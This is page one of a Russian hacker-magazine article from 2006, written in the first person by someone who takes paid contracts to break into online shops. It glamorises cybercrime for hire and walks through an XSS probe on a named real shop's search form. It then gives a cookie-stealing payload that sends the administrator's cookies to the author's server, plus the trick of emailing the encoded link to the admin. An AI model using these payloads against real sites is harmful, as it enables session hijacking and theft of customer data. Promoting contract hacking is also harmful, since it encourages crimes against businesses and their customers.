Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР #94, ОКТЯБРЬ 2006 г.

Хакер по найму

Стройков Леонид aka R0id

Хакер, номер #094, стр. 094-090-1

(r0id@mail.ru)

Взламываем на заказ

Ты когда-нибудь задумывался над тем, как профессиональные хакеры зарабатывают себе на жизнь? Я думаю, не стоит и говорить, что в нелегальной среде крутятся очень большие деньги, которые зачастую превышают годовые бюджеты некоторых стран мира. Тебе наверняка надоело ходить в рваных джинсах, грызть сухарики и запивать их второсортным пивом, да к тому же выслушивать постоянные жалобы от собственной девушки о том, что она хочет новую юбку и колье за $1000. Поверь, все можно изменить при помощи прямых рук и своих мозгов. И я покажу тебе, как это сделать.

Реальная история из виртуальной жизни

Однажды ко мне в асю постучался человек с предложением о сотрудничестве. Оказалось, что ему нужен был доступ к базам нескольких интернет-магазинов в доменной зоне .ru. Обсудив детали заказа и сумму моего гонорара, я согласился. Одним из условий клиента было обязательное прохождение теста, который заключался в получении БД с любого из двух предоставленных мне ру-шопов в течение 4-х суток. Тест полностью оплачивался заказчиком, и это меня устраивало.

На следующий день, проверяя мыло, я обнаружил мессагу с веб-адресами интернет-магазов и напоминанием о том, что время пошло. Недолго думая, я запустил Оперу и зашел на первый из двух сайтов - www.003.ru. Наполнение ресурса меня мало интересовало, и я сразу приступил к осмотру «пациента». Окинув взглядом индекс сайта, в глаза бросилась ссылка на форум, который, увы, был предусмотрительно пропатчен. Все данные в формах жестко фильтровались, и меня посылали идти лесом. Тогда я вспомнил про функцию поиска по сайту и решил попытать счастья там. В моей практике уже не раз встречались качественно написанные движки с бажными поисковиками, поэтому надежда на благоприятный исход дела не покидала меня. Я вбил в формочку поиска запрос вида:

<script>alert('xss')</script>

Потом нажал Enter, после чего браузер отобразил приветливое окошечко alert с надписью 'xss'. Это означало лишь одно: уязвимость есть и ее необходимо использовать. Я взглянул на адресную строку:

http://www.003.ru/find/1.html?findstring=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&partition=

Значение параметра findstring позволяло мне выполнить произвольный javascript-код:

http://www.003.ru/find/1.html?findstring=мой_javascript-код&partition=

Я быстренько накатал небольшой снифер на php, залил его на один из своих серверов и сформировал «ядовитый» линк для админа:

http://www.003.ru/find/1.html?findstring=<script>document.location="http://my_server.com/snif.php?"+document.cookie</script>&partition=

Где my_server.com - урл моего сервера, а snif.php - php-снифер. Затем при помощи функции bin2hex() в php я закодировал линк и отправил его в письме на мыло админу.

Прошло двое суток, а кукисы не прилетали. Ждать дальше было нельзя. На выполнение заказа у меня оставалось ровно 2 дня. Открыв браузер и набрав в адресной строке www.elson.ru, я принялся изучать сайт второго шопа. Приметив функцию поиска по сайту, я немедленно проверил ее на прочность и не прогадал. Поисковик и на этом сайте был подвержен xss:

Содержание  Вперед на стр. 094-090-2
ttfb: 3.1719207763672 ms